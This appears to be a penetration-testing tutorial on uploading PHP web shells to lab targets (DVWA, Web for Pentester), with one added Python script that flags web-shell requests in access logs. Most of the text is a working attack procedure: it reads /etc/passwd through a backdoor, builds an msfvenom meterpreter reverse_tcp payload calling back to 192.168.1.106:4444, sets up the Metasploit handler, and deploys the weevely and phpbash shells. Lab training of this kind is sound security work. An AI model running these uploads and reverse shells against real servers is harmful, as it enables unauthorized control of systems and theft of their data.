This post describes various PHP web shell uploading techniques used to gain unauthorized access to a web server by injecting malicious code written in PHP.
Table of Contents
- Introduction of PHP web shells
- Inbuilt Kali web shells
- simple-backdoor.php
- qsd-php backdoor web shell
- php-reverse-shell.php
- Using MSFvenom
- Weevely PHP web shell
- phpbash web shell
Requirements
Attacker: Kali Linux
Target: Web for Pentester, DVWA
Introduction of PHP Web Shells
Web shells are scripts written in languages such as PHP, Python, ASP, Perl and so on, which are used as backdoors for illegitimate access to a server once uploaded to it. After the backdoor has been uploaded to its destination, the attacker can directly perform read and write operations: edit any file or delete files on the server. Today we are going to explore all kinds of PHP web shells available in Kali Linux and elsewhere. So, let's get started.
Kali Linux ships with PHP scripts that can be used as backdoors to assist penetration testing work. They are stored under /usr/share/webshells/php, and a pen-tester can make use of them directly without wasting time writing PHP code for a malicious script.
- simple-backdoor.php
- qsd-php backdoor web shell
- php-reverse-shell.php
simple-backdoor.php shell
simple-backdoor.php is a web shell that provides remote code execution once injected into the web server; the script was written by "John Troon". It is already available in Kali in the /usr/share/webshells/php folder, as shown in the picture below; we then run ls -al to check the permissions on the files.
cd /usr/share/webshells/php
ls -al
Now you must find a way to upload a shell to your application. As we are doing all this on Web for Pentester, we will first try to upload the simple-backdoor PHP shell that is already available in Kali, then click on "send file" to upload the shell.
As you can see, we have successfully uploaded the malicious PHP file and received the hyperlink to the uploaded file. Next, we access simple-backdoor.php and obtain the following output. As we can observe, the usage hint "cmd=cat+/etc/passwd" is a clear indication of remote code execution.
So, let's try running cat+/etc/passwd to retrieve the server's passwd file.
cmd=cat+/etc/passwd
As a result we have extracted all the records of the passwd file; hence we can execute any command, such as ls, cp and so on, and therefore obtain a web shell by exploiting RCE.
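A defender sees the same exchange from the web server's side: the upload handler writes a .php file into a directory meant for images, and the very next request fetches that file with a cmd parameter. The script below is an added example, not part of the original post, that flags exactly those two signals in access-log lines. The upload directories (/upload/images/ for Web for Pentester, /hackable/uploads/ for DVWA) and the sample log lines are assumptions constructed for this example; adjust UPLOAD_DIRS to the application being monitored.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Assumed locations of the web-writable upload directories on the two labs.
# A .php file should never be served from here; only image/data files belong in them.
UPLOAD_DIRS = ("/upload/images/", "/hackable/uploads/")

# Query parameters that one-line PHP backdoors commonly use to receive a command.
CMD_PARAMS = {"cmd", "c", "exec", "command"}


def inspect_request(line):
    """Return the list of reasons a single access-log line looks like web-shell use."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; nothing to judge
    _client, _ts, _method, target, _status, _size = m.groups()
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qs(parts.query)  # decodes '+' to ' ' and %XX escapes
    reasons = []
    # Rule 1: a .php file being served out of a directory meant for uploaded data.
    if path.endswith(".php") and path.startswith(UPLOAD_DIRS):
        reasons.append("php script executed from upload directory")
    # Rule 2: a command-style parameter name in the query string.
    for name in sorted(CMD_PARAMS & set(params)):
        reasons.append(f"command parameter {name}={params[name][0]!r}")
    return reasons


def analyse_log(lines):
    """Scan access-log lines and return one alert dict per suspicious request."""
    alerts = []
    for line in lines:
        reasons = inspect_request(line)
        if reasons:
            client, ts, method, target, status, _ = LOG_RE.match(line).groups()
            alerts.append({"client": client, "time": ts, "request": f"{method} {target}",
                           "status": int(status), "reasons": reasons})
    return alerts


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    # The legitimate upload handler lives in /upload/, not inside /upload/images/: no alert.
    '192.168.1.50 - - [10/Oct/2023:13:55:40 +0000] "POST /upload/example1.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:13:55:52 +0000] "GET /upload/images/simple-backdoor.php?cmd=cat+/etc/passwd HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:14:02:11 +0000] "GET /hackable/uploads/meter.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    # A normal search whose value happens to be "cmd": the parameter name is q, so no alert.
    '192.168.1.77 - - [10/Oct/2023:14:05:01 +0000] "GET /search.php?q=cmd HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in analyse_log(SAMPLE_LOG):
        print(alert["client"], alert["request"], alert["status"], "->", "; ".join(alert["reasons"]))
```

Rule 1 is the more reliable of the two: it does not depend on the parameter name and fires for every shell on this page, including those (qsd-php-backdoor, weevely, phpbash) that take their input over POST or a custom parameter. A status of 200 on such a request means the server actually executed the script, which is the moment to pull the file from disk.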
qsd-php backdoor web shell
A web shell is generally considered a backdoor that enables an attacker to access and control a server remotely. qsd-php-backdoor is such a backdoor, providing a platform for executing system commands; this wonderful script was written by "Daniel Berliner".
As you can see, we have uploaded the qsd-php-backdoor.php file successfully.
Then try accessing qsd-php-backdoor.php as you did in the previous step and you will find something like the image below. Here you can perform directory traversal, and you can also access the web server directory directly by entering the command and clicking on the Go button.
As you can observe, we have accessed the current directory directly without executing any system command.
We can also execute arbitrary system commands, since this backdoor provides a platform for running shell commands such as cat /etc/passwd, ls -al and much more. We can also run two commands at once and see the result.
As you can see, we have got the result successfully.
php-reverse-shell.php
Now it is time to move on to our next PHP web shell, php-reverse-shell.php, which opens an outbound TCP connection from the web server to a host; the script was written by "pentestmonkey". A shell is attached to that TCP connection (a reverse TCP connection). With this script you can run interactive programs such as telnet, ssh, etc. This differs from the other web shell scripts, through which you send a single command and get its output back.
For this we need to open the script with nano:
nano php-reverse-shell.php
Here we need to set LISTEN_IP to the address (Kali Linux) where we want the connection, and LISTEN_PORT can be set to any port number.
Now we need to upload this web shell in order to get the reverse connection. So we upload the malicious file and, on the other side, start a netcat listener in a new terminal.
We can see that it is uploaded successfully.
Now, as soon as you execute the uploaded file, if all went well the web server should have thrown back a reverse shell to your netcat listener, and you can verify that we have got the shell successfully.
PHP Backdoor using MSFvenom
We can also generate a PHP web shell with the help of msfvenom. We therefore run the following msfvenom command to generate malicious PHP code in raw format:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 R
Then copy the code and save it under the name meter.php.
Now we upload this malicious shell to the DVWA lab to get the reverse connection. You can see the "meter.php successfully uploaded" message in the screenshot, meaning that our PHP backdoor was uploaded.
In order to execute the shell, we open its URL in DVWA.
At the same time we start the multi/handler, where we will receive the meterpreter shell, and run the following commands, specifying the lhost and lport on which to receive the reverse connection.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.106
set lport 4444
exploit
sysinfo
As soon as you browse to the uploaded path and execute the backdoor, it will give you a meterpreter session.
Weevely Shell
Weevely is a stealthy PHP web shell which simulates a Telnet-like connection and is designed for remote server administration and penetration testing. It can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, and it is an essential tool for web application post-exploitation. We can generate a PHP backdoor protected with a password.
Open the terminal and type weevely to generate a PHP backdoor, setting a password (in our case we chose "raj123"), and save this web shell as weevely.php:
weevely generate raj123 weevely.php
Now upload this web shell to the target location; in our case we uploaded it to Web for Pentester, and we open the URL in the browser to execute the web shell.
Type the following instruction to initiate the attack on the web server: pass the copied URL to the weevely command together with the password raj123, and you can see that we have got the victim's shell through weevely. We can verify this with the id command.
id
You can also check all the functionality of weevely through the help command.
phpbash shell
phpbash is a standalone, semi-interactive web shell. We download it from GitHub, change into the phpbash directory and run ls -al to check the available files.
git clone https://github.com/Arrexel/phpbash.git
cd phpbash/
ls -al
Inside phpbash we find a PHP script named "phpbash.php"; upload this script to your target location.
Now we upload this web shell to the DVWA lab and see the message that it was uploaded successfully.
Going ahead, we open the URL to execute the shell.
Here our phpbash malicious file is executed and gives us the web shell. The benefit of phpbash is that it doesn't require any listener such as netcat, because it has a built-in bash-like shell, as you can observe from the given image.
As a result we have a bash shell as www-data and can execute system commands directly through this platform.
So, in this way we have explored and performed numerous ways of getting a web shell through PHP web shells, all of which you can find in this single article.